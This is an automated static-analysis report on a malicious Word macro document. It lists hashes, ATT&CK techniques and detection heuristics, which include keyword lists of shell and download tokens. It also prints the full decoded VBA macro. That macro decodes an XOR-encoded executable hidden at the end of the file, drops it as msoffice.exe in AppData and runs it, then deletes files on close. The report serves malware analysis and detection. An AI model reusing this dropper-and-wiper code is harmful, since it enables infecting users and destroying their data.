Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 39d4079b158098ec…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 1.16 MB
Created: 2015-03-18 01:18:00
Authoring application: Microsoft Office Word
First seen: 2020-12-25
MD5: 1f3d4652082f13a8e534bb3015138f68
SHA-1: bca5accb9f1d0806f8603cf74ce0ebe9519f5004
SHA-256: 39d4079b158098ec31df14a5353e4288293d320b4a122ce509d11de64d12f51f
Risk score: 346

Malware Insights

MITRE ATT&CK
  • T1566.001 Spearphishing Attachment
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 Malicious File

The sample is a malicious Office document that uses a "Protected Document" lure to prompt the user to enable editing and content, thereby executing a VBA macro. The macro utilizes WScript.Shell and CreateObject, indicative of malicious intent. The VBA code appears to be obfuscated and truncated, but the presence of AutoOpen and AutoClose suggests it attempts to run automatically upon opening and closing the document, likely to download and execute a second-stage payload.

Heuristics (13)

  • VBA macros detected [medium] OLE_VBA_MACROS (6 related findings)
    Document contains VBA macro code
  • WScript.Shell usage [critical] OLE_VBA_WSCRIPT
    Matched line in script:
        Set asdvfdgdfbnghnhng = CreateObject("WScript.Shell")
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    Matched line in script:
        Set FSO = CreateObject("Scripting.FileSystemObject")
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro [low] OLE_VBA_AUTOOPEN
    Matched line in script:
        Sub AutoOpen()
  • Auto_Close macro [low] OLE_VBA_AUTOCLOSE
    Matched line in script:
        Sub AutoClose()
  • Environ() call (env variable access) [low] OLE_VBA_ENVIRON
    Matched line in script:
        rljosd = Environ("appdata") & "\Microsoft\Word"
  • Reference to Windows Script Host [high] SC_STR_WSCRIPT
  • OLE document has large unaccounted-for region [high] OLE_SLACK_ANOMALY
    OLE file is 1,219,642 bytes but its declared streams total only 613,068 bytes; 606,574 bytes (50%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • OLE file has appended executable-looking payload bytes [high] OLE_APPENDED_PAYLOAD
    OLE compound file contains a large high-entropy region beyond the declared major streams, and that region includes shellcode, PE, or loader API markers. This is a payload-carrier signal, not a specific CVE attribution by itself.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Macro/content-enable lure [medium] SE_ENABLE_LURE
    Document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3232 bytes
SHA-256: cda54ba5e7ce040f3c142b142b81382d754385fc2cced23f9da00e58d4afacdc

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Printer"
Public asdifbcs As String
Public rljosd As String
Function fcddsf4fd(sncvidir() As Byte, saapdawd As Long) As Byte
    
    For I = 0 To saapdawd - 1
        fcddsf4fd = fcddsf4fd Xor sncvidir(I)
    Next I

End Function
Function pasdnaiduads(sncvidir() As Byte, saapdawd As Long) As Boolean
    
    Dim VarByte As Byte
    VarByte = 35
    
    For I = 0 To saapdawd - 1
        sncvidir(I) = sncvidir(I) Xor VarByte
        VarByte = ((VarByte Xor 217) Xor (I Mod 256))
    Next I
    
    pasdnaiduads = True
    
End Function
Sub AutoClose()
        
    On Error Resume Next
    Kill asdifbcs
    
    On Error Resume Next
    Set FSO = CreateObject("Scripting.FileSystemObject")
    FSO.DeleteFile rljosd & "\*.*", True
    Set FSO = Nothing
        
End Sub
Sub AutoOpen()
    
    On Error GoTo poasdindvsidfbv
    
    Set asdvfdgdfbnghnhng = CreateObject("WScript.Shell")
     
    Dim rtgfggjuyjsasawefsd
    Dim sadbniasdfhsvb As Long
    Dim saapdawd As Long
    Dim edwefibvfdvcdfb As Byte
    
    sadbniasdfhsvb = FileLen(ActiveDocument.FullName)
    
    rtgfggjuyjsasawefsd = FreeFile
    Open (ActiveDocument.FullName) For Binary As #rtgfggjuyjsasawefsd
    
    Get #rtgfggjuyjsasawefsd, (sadbniasdfhsvb - 4), edwefibvfdvcdfb
    Get #rtgfggjuyjsasawefsd, (sadbniasdfhsvb - 3), saapdawd
            
    If saapdawd < 8 Then
        GoTo poasdindvsidfbv
    End If
    
    If (saapdawd + 4) > sadbniasdfhsvb Then
        GoTo poasdindvsidfbv
    End If
    
    Dim sdfsdfsvoxcvcvbcvb As Long
    sdfsdfsvoxcvcvbcvb = sadbniasdfhsvb - (saapdawd + 4)
         
    Dim sncvidir() As Byte
    ReDim sncvidir(saapdawd - 1)
    
    Get #rtgfggjuyjsasawefsd, sdfsdfsvoxcvcvbcvb, sncvidir
                 
    Close #rtgfggjuyjsasawefsd
    
    If Not pasdnaiduads(sncvidir(), saapdawd) Then
        GoTo poasdindvsidfbv
    End If
    
    Dim sdfsfdfgbnghj As Byte
    sdfsfdfgbnghj = fcddsf4fd(sncvidir(), saapdawd)
        
    If edwefibvfdvcdfb <> sdfsfdfgbnghj Then
        GoTo poasdindvsidfbv
    End If
        
    rljosd = Environ("appdata") & "\Microsoft\Word"
    
    Set FSO = CreateObject("Scripting.FileSystemObject")
    If Not FSO.FolderExists(rljosd) Then
       rljosd = Environ("appdata")
    End If
    Set FSO = Nothing
    
    Dim ergdfbfghtyjnjfgs
    ergdfbfghtyjnjfgs = FreeFile
    
    asdifbcs = rljosd & "\" & "msoffice.exe"
           
    Open (asdifbcs) For Binary As #ergdfbfghtyjnjfgs
    Put #ergdfbfghtyjnjfgs, 1, sncvidir
    Close #ergdfbfghtyjnjfgs
    
    Erase sncvidir
    
    asdvfdgdfbnghnhng.Run asdifbcs
        
    ActiveDocument.Save
    ActiveDocument.Close
    
Exit Sub

poasdindvsidfbv:

    Close #rtgfggjuyjsasawefsd
    Close #ergdfbfghtyjnjfgs
    
    ActiveDocument.Save
    ActiveDocument.Close
    
End Sub